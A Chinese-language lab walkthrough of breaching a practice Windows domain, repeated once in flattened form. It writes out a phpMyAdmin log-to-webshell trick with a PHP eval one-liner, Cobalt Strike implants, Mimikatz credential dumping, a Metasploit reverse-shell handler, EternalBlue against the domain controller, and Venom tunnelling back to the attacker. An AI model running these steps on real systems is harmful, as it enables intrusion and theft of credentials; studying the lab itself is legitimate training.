内网渗透靶场实验详细教学文档

0x01 靶场环境

网络拓扑结构：

攻击机：KALI (192.168.122.130)
靶机：
- Win7 (外网IP:192.168.122.142/144; 内网IP:192.168.52.143)
- Win2008 (内网IP:192.168.52.138) - 域控
- Win08 (内网IP:192.168.52.141)

0x02 外网拿权限

方法一：通过phpMyAdmin弱口令getshell

信息收集：
- 端口扫描发现80和3306开放
- 目录扫描发现phpMyAdmin路径
利用步骤：
- 使用弱口令root/root登录phpMyAdmin
- 开启general log并设置日志路径：
```
SET global general_log = on;
SET global general_log_file = 'C:/phpStudy/WWW/test.php';
```
- 执行SQL语句插入一句话木马：
```
SELECT '<?php eval($_POST["cmd"]);?>';
```
- 使用蚁剑连接test.php获取webshell

方法二：利用YXCMS漏洞getshell

发现后台：
- 通过robots.txt发现后台路径：/index.php?r=admin/index/login
- 使用默认凭证admin/123456登录
写入webshell：
- 在前台模板功能中插入一句话木马
- 通过robots.txt泄露的路径推测shell位置
- 使用蚁剑连接shell_test.php

0x03 靶机后门上线

Cobalt Strike后门植入

生成并上传后门：
- 生成exe格式的Cobalt Strike后门
- 通过蚁剑上传到靶机并执行
信息收集：
- 执行系统命令收集信息
- 探测域信息：net view /domain
- 使用Mimikatz抓取密码：
```
mimikatz::sekurlsa::logonpasswords
```
- 提权到SYSTEM权限

0x04 内网信息收集

判断域环境：
- ipconfig /all查看DNS服务器(god.org)
- net time /domain确认域控(owa.god.org)
确认域控：
- net group "domain controllers" /domain
- 确认域控IP为192.168.52.138

0x05 内网横向移动

SMB Beacon配置

创建SMB Listener
- 在Cobalt Strike中新建SMB类型的Listener
- 在已有Beacon上右键Spawn选择SMB Listener

反弹shell给MSF：

MSF配置：

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.122.130
set lport 8888
exploit

Cobalt Strike中创建对应Listener

内网扫描与攻击

配置路由：

run get_local_subnets
run autoroute -s 192.168.52.0/24
run autoroute -p

扫描内网：
- 使用netbios模块扫描存活主机
- 端口扫描发现445开放

MS17-010攻击：

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.52.138
run

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.52.138
run

抓取凭证：

load mimikatz
msv       # 获取hash
ssp       # 获取明文
wdigest   # 获取明文
kerberos  # 获取明文

0x06 端口转发连接3389

MSF端口转发

portfwd add -l 9999 -r 192.168.52.138 -p 3389

连接192.168.122.130:9999访问域控3389

Venom工具使用

环境搭建：
- KALI监听：./admin_linux_x64 -lport 4343
- Win7连接：agent.exe -rhost 192.168.122.130 -rport 4343
- 域控连接：agent.exe -rhost 192.168.52.143 -rport 4343
端口转发：
```
goto 2
rforward 192.168.52.138 3389 9999
```
- 远程连接KALI的9999端口访问域控

关键知识点总结

外网突破：
- 弱口令利用
- 日志文件getshell
- CMS已知漏洞利用
内网渗透：
- 信息收集(域环境判断)
- 横向移动(SMB Beacon)
- 漏洞利用(MS17-010)
权限维持：
- Cobalt Strike后门
- 端口转发技术
- 多级代理工具(Venom)
凭证获取：
- Mimikatz使用技巧
- Hash与明文获取方法

本实验完整演示了从外网突破到内网横向移动的全过程，涵盖了多种渗透测试中常用的技术手段。

内网渗透靶场实验详细教学文档 0x01 靶场环境网络拓扑结构：攻击机：KALI (192.168.122.130) 靶机： Win7 (外网IP:192.168.122.142/144; 内网IP:192.168.52.143) Win2008 (内网IP:192.168.52.138) - 域控 Win08 (内网IP:192.168.52.141) 0x02 外网拿权限方法一：通过phpMyAdmin弱口令getshell 信息收集：端口扫描发现80和3306开放目录扫描发现phpMyAdmin路径利用步骤：使用弱口令root/root登录phpMyAdmin 开启general log并设置日志路径：执行SQL语句插入一句话木马：使用蚁剑连接test.php获取webshell 方法二：利用YXCMS漏洞getshell 发现后台：通过robots.txt发现后台路径： /index.php?r=admin/index/login 使用默认凭证admin/123456登录写入webshell：在前台模板功能中插入一句话木马通过robots.txt泄露的路径推测shell位置使用蚁剑连接shell_ test.php 0x03 靶机后门上线 Cobalt Strike后门植入生成并上传后门：生成exe格式的Cobalt Strike后门通过蚁剑上传到靶机并执行信息收集：执行系统命令收集信息探测域信息： net view /domain 使用Mimikatz抓取密码：提权到SYSTEM权限 0x04 内网信息收集判断域环境： ipconfig /all 查看DNS服务器(god.org) net time /domain 确认域控(owa.god.org) 确认域控： net group "domain controllers" /domain 确认域控IP为192.168.52.138 0x05 内网横向移动 SMB Beacon配置创建SMB Listener 在Cobalt Strike中新建SMB类型的Listener 在已有Beacon上右键Spawn选择SMB Listener 反弹shell给MSF： MSF配置： Cobalt Strike中创建对应Listener 内网扫描与攻击配置路由：扫描内网：使用netbios模块扫描存活主机端口扫描发现445开放 MS17-010攻击：抓取凭证： 0x06 端口转发连接3389 MSF端口转发连接192.168.122.130:9999访问域控3389 Venom工具使用环境搭建： KALI监听： ./admin_linux_x64 -lport 4343 Win7连接： agent.exe -rhost 192.168.122.130 -rport 4343 域控连接： agent.exe -rhost 192.168.52.143 -rport 4343 端口转发：远程连接KALI的9999端口访问域控关键知识点总结外网突破：弱口令利用日志文件getshell CMS已知漏洞利用内网渗透：信息收集(域环境判断) 横向移动(SMB Beacon) 漏洞利用(MS17-010) 权限维持： Cobalt Strike后门端口转发技术多级代理工具(Venom) 凭证获取： Mimikatz使用技巧 Hash与明文获取方法本实验完整演示了从外网突破到内网横向移动的全过程，涵盖了多种渗透测试中常用的技术手段。